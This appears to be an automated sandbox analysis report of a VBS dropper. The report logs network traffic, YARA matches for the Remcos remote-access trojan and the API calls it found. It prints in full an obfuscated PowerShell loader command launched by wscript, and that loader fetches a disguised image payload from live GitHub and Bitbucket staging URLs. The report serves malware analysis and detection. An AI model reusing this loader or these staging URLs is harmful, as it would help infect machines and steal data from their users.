Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0041EE6D recv,

13_2_0041EE6D

Source: global traffic	HTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /IJEUWAESIKA/nna/refs/heads/main/IFiinmS.txt HTTP/1.1Host: raw.githubusercontent.com

Source: RegAsm.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1731133022.000001ECDAE0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFD11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1731133022.000001ECDAD8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000002.00000002.1731133022.000001ECDADDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFD11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD540A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD48C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD53E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000002.00000002.1731133022.000001ECDB2F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE273000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420078473.000001CFCE454000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420192137.000001CFCFD00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE2EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD4285000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417
Source: powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD5785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD48C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3CC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/IJEUWAESIKA/nna/refs/heads/main/IFiinmS.txt
Source: powershell.exe, 00000002.00000002.1764099594.000001ECF3383000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1731133022.000001ECDB2F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE273000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420078473.000001CFCE454000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420192137.000001CFCFD00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE2EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD4285000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown

HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49699 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow,

13_2_0040F4A7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

13_2_0040F4A7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

13_2_0040F4A7

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2557660938.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4512, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00414D7F SystemParametersInfoW,

13_2_00414D7F

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: Process Memory Space: powershell.exe PID: 4872, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

13_2_0040F4A7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041606A	13_2_0041606A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042E240	13_2_0042E240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0043120A	13_2_0043120A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042B2F1	13_2_0042B2F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004304C1	13_2_004304C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041F4D3	13_2_0041F4D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040F4A7	13_2_0040F4A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0044B4B0	13_2_0044B4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0044553C	13_2_0044553C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00417621	13_2_00417621
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0043163F	13_2_0043163F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004476F8	13_2_004476F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0043B690	13_2_0043B690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042D79B	13_2_0042D79B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0043680C	13_2_0043680C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040D9A0	13_2_0040D9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004309BD	13_2_004309BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00436A3B	13_2_00436A3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041FB71	13_2_0041FB71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00445C59	13_2_00445C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041FCB4	13_2_0041FCB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00430DD5	13_2_00430DD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041EFDC	13_2_0041EFDC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0042BE7E appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0042C720 appears 50 times

Source: scan_doc20241024.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4520
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4520			Jump to behavior

Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: Process Memory Space: powershell.exe PID: 4872, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, SimpleZip.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, SimpleZip.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, SimpleZip.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.powershell.exe.1cfcfc00000.0.raw.unpack, SimpleZip.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.powershell.exe.1cfcfc00000.0.raw.unpack, SimpleZip.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.powershell.exe.1cfcfc00000.0.raw.unpack, SimpleZip.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.expl.evad.winVBS@8/7@0/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00410D25 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

13_2_00410D25

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0040A7FF CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

13_2_0040A7FF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00413B85 FindResourceA,LoadResource,LockResource,SizeofResource,

13_2_00413B85

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

